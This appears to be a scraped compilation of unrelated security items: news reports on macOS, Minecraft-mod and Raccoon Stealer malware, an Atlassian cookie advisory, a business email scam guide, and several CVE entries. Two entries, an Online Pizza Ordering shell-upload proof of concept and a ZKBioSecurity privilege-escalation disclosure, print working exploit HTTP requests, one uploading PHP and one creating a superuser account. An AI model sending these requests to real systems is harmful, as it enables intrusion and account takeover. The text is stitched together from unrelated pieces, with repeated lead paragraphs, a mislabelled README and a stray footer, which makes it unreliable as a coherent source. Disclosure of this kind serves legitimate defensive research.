A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.
"Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat

A new variant of the macOS malware tracked as **UpdateAgent** has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.

"Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report.

UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.

The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.

"The primary difference \[between the two executables\] is that it reaches out to a different URL from which it should load a bash script," the researchers noted.

These bash scripts, named "activedirec.sh" or "bash\_qolveevgclr.sh", include a URL pointing to Amazon S3 buckets to download and run a second-stage disk image (DMG) file to the compromised endpoint.

"The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

UpdateAgent Returns with New macOS Malware Dropper Written in Swift

Jira, Confluence,Trello, and BitBucket affected.

**BENGALURU, December 13, 2022 —** Researchers at CloudSEK observed that for Atlassian products - Jira, Confluence, and BitBucket, cookies are not invalidated, even if the password is changed, with 2FA (Two-factor Authentication) enabled, as the cookie validity is 30 days. They only expire when the user logs out, or after 30 days.

CloudSEK researchers have identified that this flaw can be leveraged by threat actors to take over hundreds of companies’ Jira accounts. Our records show over 1,282,859 compromised computers and 16,201 Jira cookies for sale on dark web marketplaces. And just in the last 30 days, over 2,937 compromised computers and 246 Jira credentials were made available. In the past 90 days, we have observed at least one compromised computer from a Fortune 1000 company. This is just considering their primary domains, not their subsidiaries. (Check the complete blog) 

The new finding came after Dec 06, 2022, when CloudSEK disclosed a cyber attack directed at the company. During the course of the investigation into the root cause of the incident, the internal investigation team identified that the threat actor gained access to a CloudSEK employee’s Jira account, using Jira session cookies present in stealer logs being sold on the dark web.

CloudSEK is releasing a free tool that lets companies check if their compromised computers and Jira accounts are being advertised on dark web marketplaces.

With over 10 million users across 180,000 companies, including 83% of Fortune 500 companies, Atlassian products are widely used across the globe. And threat actors are actively exploiting this flaw to compromise enterprise Jira accounts.

**Stolen Atlassian Cookies Can Lead to Unauthorized Account Access even if 2FA enabled**

CloudSEK’s investigation shows that cookies of Atlassian products remain valid for a period of 30 days, even if the password is changed and 2FA is enabled. Hence, threat actors can restore Jira, Confluence, Trello, or BitBucket sessions, using stolen cookies, even if they don’t have access to Multi-factor Authentication (MFA), OTP/ PIN. The cookies, by default, expire when the user logs out, or after 30 days.(Check the complete blog)

This is a known issue, and most companies do not consider it to be within the scope of security reporting, because to use this and get into systems, tokens are required.

However, it is no longer very difficult for threat actors to get their hands on these tokens. With the rise in device compromise campaigns, breaches, and password leaks, cookie theft has become commonplace. And cookies are available for sale and one can simply search for a company, buy their logs, find relevant tokens to gain access to their internal systems. In the last 30 days, more than 200unique instances of atlassian.net related credentials/ cookies have been put up for sale on darkweb marketplaces. Given that the credentials were put up for sale in the last 30 days, it is highly likely that many of them are still active.

In the case of Atlassian products, only one JSON web token (JWT) is required to hijack a session i.e._cloud.session.token_. Atlassian JWT (JSON Web Token) tokens have the email address embedded in the cookie. Hence, it is easy to determine which user the cookie belongs to.

You can check if your organization’s data is available for sale on dark web marketplaces here.

Security Flaw in Atlassian Products Affecting Multiple Companies

Malware hidden in fake Minecraft Mods on GitHub is stealing passwords and crypto from players. Over 1,500 devices may be affected, researchers warn.

A new malware campaign has been targeting Minecraft players through fake mod downloads, according to recent findings from Check Point Research (CPR). Shared through GitHub and disguised as popular **Minecraft cheat mods**, the files carry a layered infection that can steal everything from saved passwords to cryptocurrency.

**Malware Hidden Inside Mods**

The campaign, which surfaced in March 2025, focused on active players using mods to enhance their gameplay. Mods like Oringo and Taunahi, widely known in the Minecraft cheat community, were mimicked to attract downloads. But instead of extra features, these files installed malware in three stages.

According to CPR’s **blog post**, first came a Java-based downloader. After confirming the user was running Minecraft and not a sandboxed or virtual environment, it dropped the download of a second-stage stealer which harvested login credentials and other sensitive files.

The final payload, a more advanced spyware tool, dug even deeper. It scanned for data in Discord, Steam, Telegram, web browsers and **crypto wallets.** It could also take screenshots and collect technical details from the infected machine. Data stolen through this campaign was then sent out over Discord, making the exfiltration hard to detect.

****Russian-Speaking Attacker Suspected****

Hints from the malware’s code, including Russian-language comments and UTC+3-based activity patterns, point to a Russian-speaking threat actor. The operation was linked to a group Check Point referred to as the Stargazers Ghost Network, a malware delivery system that uses a distribution-as-a-service model. The same system was **previously seen in July 2024** distributing malware through more than 3,000 fake GitHub accounts.

In the latest Minecraft scam, CPR’s research also traced the campaign across several GitHub repositories, each posing as legitimate mod tools. This helped the malware gain reach while avoiding immediate suspicion. Based on internal traffic analysis, the researchers estimate that at least 1,500 devices may have been compromised so far.

Malicious GitHub repositories (Image via CPR)

****Why Minecraft Was the Perfect Target****

Minecraft’s global popularity makes it a prime target for these kinds of attacks. With over 200 million monthly active users and more than a million modders, the game has built an extensive infrastructure of user-created content. Many players are young and may not be well-equipped to spot fake downloads, especially when they’re presented as performance boosters or cheats.

The modding community thrives on open sharing, but that openness has become a vulnerability. Attackers are betting that users won’t double-check the origin of a mod if it looks familiar.

This is why in October 2021, Minecraft was identified as **the most malware-infected game** after researchers found 44,335 compromised devices and over 300,000 malware cases targeting its players.

****What Players Should Do****

This attack is just another example of how familiar online platforms, especially those used by younger audiences, are being turned into distribution channels for malware. If you’re a Minecraft player or a parent of one, now’s a good time to check your devices and habits:

*   Stick to mods from well-known and verified platforms.
*   Make sure your antivirus and security updates are current.
*   Avoid any mod claiming to offer hacks, cheats or automation.
*   Monitor accounts linked to Discord, gaming platforms or crypto wallets for suspicious activity.

Fake Minecraft Mods on GitHub Found Stealing Player Data

A 26-year-old Ukrainian national has been charged in the U.S. for his alleged role in the Raccoon Stealer malware-as-a-service (MaaS) operation.
Mark Sokolovsky, who was arrested by Dutch law enforcement after leaving Ukraine on March 4, 2022, in what's said to be a Porsche Cayenne, is currently being held in the Netherlands and awaits extradition to the U.S.
"Individuals who deployed Raccoon

A 26-year-old Ukrainian national has been charged in the U.S. for his alleged role in the Raccoon Stealer malware-as-a-service (MaaS) operation.

Mark Sokolovsky, who was arrested by Dutch law enforcement after leaving Ukraine on March 4, 2022, in what's said to be a Porsche Cayenne, is currently being held in the Netherlands and awaits extradition to the U.S.

"Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency," the U.S. Department of Justice (DoJ) said. "These individuals used various ruses, such as email phishing, to install the malware onto the computers of unsuspecting victims."

Sokolovsky is said to have gone by various online monikers like Photix, raccoonstealer, and black21jack77777 on online cybercrime forums to advertise the service for sale.

Raccoon Stealer, mainly distributed under the guise of cracked software, is known to be one of the most prolific information stealers, put to use by multiple cybercriminal actors for its extensive features and the customizability offered by the malware.

Active since April 2019, the threat actors behind the operation abruptly halted work on the project earlier this March, citing the loss of a core member due to a "special operation."

While this was interpreted as the death of a developer in the Russo-Ukrainian war, court documents show that it was indeed Sokolovsky's arrest and the subsequent dismantling of the malware's infrastructure by Italian and Dutch authorities that led to the temporary shutdown.

That said, a second version of Raccoon Stealer written in C/C++ has since begun circulating on underground forums as of June 2022, with its authors touting the tool's ease of use.

"It is so fast and simple that with its help it will not be difficult for a child to learn how to process logs," the cybercrime gang posted in a message shared on its Telegram channel in May.

According to the U.S. Federal Bureau of Investigation (FBI), the malware is estimated to have facilitated the theft of 50 million unique credentials and forms of identification (e.g., email addresses, bank accounts, cryptocurrency addresses, and credit card numbers) from millions of victims globally.

The credentials allegedly consist of over four million email addresses, prompting the FBI to launch a website raccoon.ic3\[.\]gov to help users check if their email addresses show up in the Raccoon Stealer data.

Sokolovsky has been charged with one count of conspiracy to commit computer fraud and related activity in connection with computers; one count of conspiracy to commit wire fraud; one count of conspiracy to commit money laundering; and one count of aggravated identity theft.

If proven guilty, the defendant faces a maximum penalty of 20 years in prison for the wire fraud and money laundering offenses, five years for the conspiracy to commit computer fraud charge, and a mandatory consecutive two-year term for the aggravated identity theft offense.

"This type of malware feeds the cybercrime ecosystem, harvesting valuable information and allowing cyber criminals to steal from innocent Americans and citizens around the world," U.S. Attorney Ashley C. Hoff said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Charges Ukrainian Hacker Over Role in Raccoon Stealer Malware Service

In visitUris of Notification.java, there is a possible bypass of user profile boundaries due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.

)\]}' { "commit": "20aedba4998373addc2befcc455a118585559fef", "tree": "340811a95a87f990ed276f6ee25de0521cdbd9e7", "parents": \[ "593ee4d787b7480da68c54de66f8e3c7cdf8b857" \], "author": { "name": "Ioana Alexandru", "email": "aioana@google.com", "time": "Mon Jul 03 16:29:47 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu Jul 06 04:03:21 2023 +0000" }, "message": "DO NOT MERGE Revert \\"Verify URI permissions for EXTRA\_REMOTE\_INPUT\_HISTORY\_ITEMS.\\"\\n\\nThis reverts commit 43b1711332763788c7abf05c3baa931296c45bbb.\\n\\nReason for revert: regression reported at b/289223315\\n\\nBug: 289223315\\nBug: 276729064\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:bdc9b977e376fb3b6047530a179d00fd77f2aec1)\\nMerged-In: I101938fbc51592537023345ba1e642827510981b\\nChange-Id: I101938fbc51592537023345ba1e642827510981b\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "e564ec1490373e7b1d280b36bb112414bd1a20fd", "old\_mode": 33188, "old\_path": "core/java/android/app/Notification.java", "new\_id": "1c40711f888bc4410d3e1d779a67e50e243b712b", "new\_mode": 33188, "new\_path": "core/java/android/app/Notification.java" }, { "type": "modify", "old\_id": "28480bcda4eb13baf696a5a4385e986aaac31f8b", "old\_mode": 33261, "old\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java", "new\_id": "50fb94591654935f329e53d76531ff2ed69a3817", "new\_mode": 33261, "new\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java" } \] }

CVE-2023-21244

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

In this common email scam, a criminal pretending to be your boss or coworker emails you asking for a favor involving money. Here's what do to when a bad actor lands in your inbox.

Don't close this tab! I know there are few combinations of words less interesting than business, email, and compromise. I may as well have written an article about fiber, socks, and responsibility. But this isn't a boring article: it's an article about email con artists who, according to the FBI, are pulling in $26 billion a year by scamming people.

So yeah: business email compromise scams are a big deal. The con artists behind this criminal enterprise will cold email you, pretending to be someone you work with, in order to gain access to money or information. You might get an email that appears to be from your company's CEO asking you to quickly do something like buy gift cards, or you might get an email that looks like it's from an employee at your company asking you to change their direct deposit information. The scam itself can take a lot of forms, but the end goal is to somehow siphon money away from you or the business you work for.

It's worth it for anyone with a desk job to take a few moments to learn how to spot these emails. I talked with a few experts, and they passed along some helpful advice.

**Always Question Urgency**

When I asked two cybersecurity experts about BEC fraud, I expected them to lead with technical advice. Both started with emotions. This makes sense: while such fraud happens on computers, it is at its heart about psychological manipulation. So spotting an email compromise scam requires getting in touch with how you're feeling.

"If an email elicits an emotional response, take a step back and reread it when you're more calm," says Ronnie Tokazowski, a security researcher who has been working to educate people about email scams for over a decade. Tokazowski emphasizes how important creating a false sense of urgency is to such scams. The stress the scam induces is what keeps you from questioning the premise. "People who get pulled into these types of scams … their emotions get very deregulated," he says. That makes you less capable of thinking critically, which is a key part of how such scams work.

Selena Larson, a threat researcher at cybersecurity firm Proofpoint, went a step further. "I don't know if you can print this, but honestly: just breathe," she says. "Slow down, take a deep breath. That actually helps you think more clearly and rationally. Walk away from your computer or your phone and think critically. Would this be an email that someone would send me? Is this is a logical thing that I'm being asked to do?"

You should be particularly skeptical if the person sending the email asks you to keep something quiet.

"Scammers do things like isolate you from your peers," says Larson. "They come at you from a position of authority and say things like, 'Please keep this confidential and only between us.' This type of social engineering makes it so people feel like they have to take an action with some kind of urgency, and that you can't share it with anybody."

So this is the first step: take control of your emotions. Yes, it can be difficult if you work in a demanding field. But it's your best first defense, and your employer will thank you for it (or, at least, they should).

**Always Confirm Through a Second Channel**

Now that you're skeptically questioning the legitimacy of the urgent request, check to make sure the email is coming from the person it claims to be from. The best way to do this is to ask—just be careful.

"If you received an email like this, it's important to pick up the phone and call the number you know to be legitimate," says Larson, adding a caveat. "Do not rely on a phone number in the email itself—it will be owned by the threat actor."

This is a crucial point: any contact information in the email itself is likely compromised, and sometimes cleverly so. Use the phone number you've already saved in your phone for the person in question, or look up the phone number on an official website or in an official company directory. This applies even if the number in the email looks correct, because some scammers will go through the trouble of getting a phone number that's similar to that of the person they're impersonating, all on the hopes that you'll call that number instead of the real one.

"I've seen phone numbers off two digits from the actual phone number," says Tokazowski.

Call the person who supposedly emailed you—using a number you are 100 percent sure is real—and confirm the request is authentic. You could also use some other secure communication channel like Slack or Microsoft Teams, or, if they're in the office, just ask them face to face. The point is to confirm any urgent request somewhere outside of the initial email. And even if the person is your boss or some other bigwig, do not worry about wasting their time.

"The person that is being impersonated would so much rather have someone take the time to confirm than to lose thousands or a million dollars in a malicious transaction," says Larson.

**Check the Email Address**

Getting in touch with the supposed sender isn't always an option. If not, there are a few tricks you can use to spot whether an email is real or fake. The first: check the email address and make sure it's from company domain.

"Always check the domains that you're receiving emails from," says Larson. Sometimes this will be obvious; your CEO likely isn't emailing you from a Gmail account, for example. Sometimes it will be more subtle—fraudsters have been known to purchase domains that look similar to that of the company they're attempting to fraud, all in the hopes of appearing legitimate.

It's also worth checking to see if the email signature matches the address the email is coming from. “If you look in the footer, they'll use the actual domain of the company to make it look legitimate, but that won't match the email address,” says Larson. Just keep in mind that the difference might be subtle. “Lookalike domains are very common: someone will do a slight variation, like an ‘l’ instead of an ‘i’, to make it look legitimate.” One way to test that, if you're suspicious, is to copy and paste the domain half of the address into a browser. If you don't get a website, you're probably dealing with a fake.

Another trick scammers will use is email spoofing, which you can spot by clicking reply and checking the email address that shows up in the "To" field. If it's a different email address than the one the email looks like it arrived from, you're likely dealing with a fake request.

**Go Through the Proper Protocols**

Now this is boring, but the best defense against business email compromise scams might be old-fashioned bureaucracy. If there is a process in place for things that are the common target of scams—large purchases, for example, or updating financial information in a database—then your company is less likely to fall victim to such scams.

“Most of the time, from a process perspective, that request of purchasing something would need to go through human resources, procurement,” says Tokazowski. If you get a request like this over email asking you to bypass the usual processes, be skeptical. “There needs to be a paper trail. Someone saying ‘purchase this from your personal account’ is a process that just wouldn't happen.”

A healthy company probably shouldn't be using email as the workflow for important financial processes. If you want to change your direct deposit information, for example, it's terrible practice for the workflow.

**Leaders: Keep Communication Open**

I have one last piece of advice, and it's for leaders inside companies: don't act in such a way that people will mistake scammers for you. If you regularly email employees and ask for urgent favors while telling people to keep quiet about these requests and to not work through the official channels, you're increasing the odds that your company falls victim to such scams. On the other hand, if you create a company culture of transparency, you're making the company stronger and more resistant.

“An important step is to ensure that you're trying to foster a culture of open communication,” says Tokazowski. Many organizations are structured in a way that communication between various levels is minimized. In such organizations, Tokazowski says, “skip-level meetings” are helpful. This is a style of meeting where a senior manager meets with a middle manager's direct reports without the middle manager there—skipping a level in the hierarchy—to develop stronger paths of communication between all the levels.

Another thing leaders should keep in mind is how important it is to talk openly if your company falls victim to such a scam.

“The shame that people feel, regardless of the type of scam, feeling horrible, is part of how these scams keep working,” says Larson. “Talking about it openly helps the person, their peers, and their colleagues learn how to understand how to protect themselves.”

How to Spot a Business Email Compromise Scam

An arbitrary file upload vulnerability in the file upload module of PayloadCMS v0.15.0 allows attackers to execute arbitrary code via a crafted SVG file.

**Payload**

A self-hosted, TypeScript / JavaScript headless CMS & application framework built with Express, MongoDB and React.

 ![](https://github.com/payloadcms/payload/workflows/build/badge.svg)![npm](https://camo.githubusercontent.com/291136cc5f210261449e7c93b9d1d54f68c160323111e76ab3077db25f83a059/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f7061796c6f6164) ![Tweet Payload](https://camo.githubusercontent.com/90bc908826728c0e4261acfff5619fd732c7be2b2a00624fce6363c9a3623c90/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f687474702f736869656c64732e696f2e7376673f7374796c653d736f6369616c)

![Payload headless CMS Admin panel built with React](https://camo.githubusercontent.com/c7a24c392349595fa0253de25e649dd5a8673cea4cf3b648a1173a4fc2482c88/68747470733a2f2f7061796c6f6164636d732e636f6d2f696d616765732f6f672d696d6167652e6a7067)**Quick Start**

Alternatively, it only takes about five minutes to create an app from scratch.

**Documentation**

Check out the Payload website to find in-depth documentation for everything that Payload offers.

**Features**

*   GraphQL, REST, and Local APIs
*   Easily customizable ReactJS Admin
*   Fully self-hosted
*   Extensible Authentication
*   Local file storage & upload
*   Field-based Localization
*   Block-based Layout Builder
*   Extensible SlateJS rich text editor
*   Array field type
*   Field conditional logic
*   Extremely granular Access Control
*   Document and field-level hooks for every action Payload provides
*   Built with Typescript & very Typescript-friendly
*   Intensely fast API
*   Highly secure thanks to HTTP-only cookies, CSRF protection, and more

**Code-first**

If you know JavaScript, you know Payload. Payload is a _code-first_ CMS, which allows us to do a lot of things right:

*   Payload gives you everything you need, but then steps back and lets you build what you want in JavaScript or TypeScript - with no unnecessary complexity brought by GUIs. You'll understand how your CMS works, because you will have written it exactly how you want it.
*   Bring your own Express server and do whatever you need on top of Payload. Payload doesn't impose anything on you or your app.
*   Completely control the Admin panel by using your own React components. Swap out fields or even entire views with ease.
*   Use your data however and wherever you need thanks to auto-generated, yet fully extensible REST, GraphQL and Local Node APIs.

**Free forever for personal use and small projects**

Payload is 100% free for personal projects or small use cases where only one admin user is required. You can also get started without an account whatsoever while running on `localhost`.

**Installation**

Before beginning to work with Payload, make sure you have all of the required software.

From there, the easiest way to get started with Payload is to use the `create-payload-app` package:

Alternatively, it only takes about five minutes to write out your own app from scratch.

**License**

Find the Payload license here.

CVE-2022-27952: GitHub - payloadcms/payload: Headless CMS and Application Framework built with TypeScript, Node.js, React and MongoDB

A denial of service vulnerability exists in the cgiserver.cgi Upgrade API functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A denial of service vulnerability exists in the cgiserver.cgi Upgrade API functionality of reolink RLC-410W v3.0.0.136\_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Reolink RLC-410W v3.0.0.136\_20121102

**Product URLs**

RLC-410W - https://reolink.com/us/product/rlc-410w/

**CVSSv3 Score**

7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

**CWE**

CWE-284 - Improper Access Control

**Details**

The Reolink RLC-410W is a WiFi security camera. The camera includes motion detection functionalities and various methods to save the recordings.

The RLC-410W offers different APIs for different levels of authentication. One of these APIs reboots the device. This API should be executed by administrator users only.

A specially-crafted HTTP request can kill the `cgiserver.cgi` process and lead to the reboot of the device, without the required permission.

The `cgiserver.cgi` checks if a user has the permission to perform a certain action in the API functionality itself. For instance, for the `Upgrade` API we have the following instructions at the beginning of the code:

    undefined4 Upgrade(cgi_session *session,cgi_cmd *cmd)
    
    {
        [...]
        
        if (cmd->parsing_status == NOT_HANDLED) {
            error_code = cgi_check_ability(cmd->command_ID,session,0);                                      [1]
            if (error_code != NO error) {
            cgi_log(1,0,"[%s,%d]",
                    "/home/lgb/ipc_v1_ver/20201211/ipc_20200324_V1/product/cgiserver/src/cgi_system.cpp",
                    0xf1e);
            cgi_log(0,0,"cmd%d, cgi_check_abiliby failed! [need reboot]",cmd->command_ID);
            cmd->HTTP_status_code = error_code;
            cmd->associated_request->perform_reboot = 1;                                                    [2]
            return 0xffffffff;
            }
            cmd->parsing_status = PARSE_OK;
        }
    [...]
    }
    

At `[1]` the permission of the user is checked against the permission of the required API, `Upgrade` in this specific case. This prohibits the execution of certain APIs for non-authorized users. But in the specific case of `Upgrade`, if the permission check fails, the device will set, at `[2]`, the `perform_reboot` flag and the device will reboot, essentially allowing a non-authorized user to perform the reboot operation.

Note that, while this issue requires a logged-in user, it’s possible to use TALOS-2021-1420 to perform this API call without authentication. In this case, the actual chained CVSS score would be 8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

**Timeline**

2021-12-06 - Vendor Disclosure  
2022-01-19 - Vendor Patched  
2022-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2021-40405: TALOS-2021-1422 || Cisco Talos Intelligence Group

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

Search

lenovo warranty check/lookup | check warranty status | lenovo support us